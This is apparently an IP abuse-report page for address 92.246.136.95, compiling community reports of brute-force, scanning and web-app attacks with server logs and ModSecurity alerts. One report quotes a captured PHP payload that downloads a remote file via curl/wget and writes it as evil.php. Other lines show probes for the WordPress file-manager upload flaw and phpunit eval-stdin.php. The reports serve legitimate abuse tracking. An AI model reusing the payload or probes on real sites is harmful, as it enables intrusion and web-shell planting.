Anonymous
2024-11-20 08:22:20
(3 weeks ago)
Ports: 25,110,143,993,995; Direction: 0; Trigger: LF_CUSTOMTRIGGER
Brute-Force
SSH
rtbh.com.tr
2024-11-16 20:53:21
(3 weeks ago)
list.rtbh.com.tr report: tcp/0
Brute-Force
adalbertoreyes.org
2024-11-16 17:59:31
(3 weeks ago)
CategoryPortScan
Port Scan
mirekdusin
2024-11-16 06:24:00
(4 weeks ago)
"body": "<?php file_put_contents('evil.php',file_get_contents('http://164.90.169.189/~mcjoomlaphp/seoforce/triggers/files/evil.txt')); if(!file_exists('evil.php')){ system('wget http://164.90.169.189/~mcjoomlaphp/seoforce/triggers/files/evil.txt -O evil.php;curl http://164.90.169.189/~mcjoomlaphp/seoforce/triggers/files/evil.txt -O evil.php'); }?>"
Web App Attack
rtbh.com.tr
2024-11-15 20:53:16
(4 weeks ago)
list.rtbh.com.tr report: tcp/0
Brute-Force
london2038.com
2024-11-15 17:16:47
(4 weeks ago)
Attacking WordPress
92.246.136.95 - - [15/Nov/2024:18:16:43 +0100] "POST /wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php HTTP/1.1" 403 17028 "-" "python-requests/2.27.1"
Brute-Force
Web App Attack
el-brujo
2024-11-15 16:47:02
(4 weeks ago)
15/Nov/2024:17:47:02.054574 +0100Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client 92.246.136.95] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/etc/httpd/modsecurity.d/activated_rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "703"] [id "920340"] [msg "Request Containing Content, but Missing Content-Type header"] [severity "NOTICE"] [ver "OWASP_CRS/3.3.4"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "paranoia-level/1"] [tag "OWASP_CRS"] [tag "capec/1000/210/272"] [hostname "elhacker.info"] [uri "/Cursos/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "Zzd7BkSRR-EuYn0cyan6BwAAAvk"]
...
Hacking
Web App Attack
MortimerCat
2024-11-15 16:17:12
(4 weeks ago)
Unauthorised use of XMLRPC
Web App Attack
David Gebler
2024-11-15 15:39:34
(4 weeks ago)
92.246.136.95 - - [15/Nov/2024:15:39:33 +0000] "POST /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1" 404 4630 "-" "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36"
Brute-Force
Web App Attack
MortimerCat
2024-11-15 12:57:53
(4 weeks ago)
Trying to access wordpress plugins
Web App Attack
hermawan
2024-11-15 06:45:36
(4 weeks ago)
[Fri Nov 15 13:44:20.504578 2024] [authz_core:error] [pid 189320:tid 128486656157376] [client 92.246.136.95:42978] AH01630: client denied by server configuration: /var/www/administrator/index.php [staklim-jatim.bmkg.go.id] [staklim-jatim.bmkg.go.id] top=[189431] [ZtGI5bUJr14] [ZzbtxLYfKclmqISFkJ-7PgAAA40] keep_alive=[0] [2024-11-15 13:44:20.504585] [R:ZzbtxLYfKclmqISFkJ-7PgAAA40] UA:'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36' Host:'staklim-jatim.bmkg.go.id' ACCEPT:'*/*' Accept-Encoding:'gzip, deflate, br Upgrade-Insecure-Requests:'1
...
Hacking
Web App Attack
Apache
2024-11-15 06:40:33
(4 weeks ago)
(mod_security) mod_security (id:232380) triggered by 92.246.136.95 (DE/Germany/wanting-wax-n1.aeza.network): 5 in the last 300 secs
Brute-Force
Web App Attack
Aetherweb Ark
2024-11-15 04:40:46
(4 weeks ago)
(mod_security) mod_security (id:232380) triggered by 92.246.136.95 (DE/Germany/wanting-wax-n1.aeza.network): N in the last X secs
Web App Attack
TPI-Abuse
2024-11-15 04:31:52
(4 weeks ago)
(mod_security) mod_security (id:234930) triggered by 92.246.136.95 (wanting-wax-n1.aeza.network): 1 in the last 300 secs; Ports: *; Direction: 1; Trigger: LF_MODSEC; Logs: [Thu Nov 14 23:31:45.274598 2024] [security2:error] [pid 24570:tid 24570] [client 92.246.136.95:38770] [client 92.246.136.95] ModSecurity: Access denied with code 403 (phase 2). Pattern match "\\\\/lib\\\\/php\\\\/connector\\\\.minimal\\\\.php$" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/comodo_apache/27_Apps_WPPlugin.conf"] [line "6778"] [id "234930"] [rev "2"] [msg "COMODO WAF: File upload vulnerability in the file manager plugin before 6.9 for WordPress (CVE-2020-25213)||www.doctoredwinalvarez.com|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WPPlugin"] [hostname "www.doctoredwinalvarez.com"] [uri "/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php"] [unique_id "ZzbOscWhpAlv-u3GRqUT5QAAAAI"]
Brute-Force
Bad Web Bot
Web App Attack
Anonymous
2024-11-15 01:32:03
(4 weeks ago)
Bot / scanning and/or hacking attempts: POST /xmlrpc.php HTTP/1.1
Hacking
Web App Attack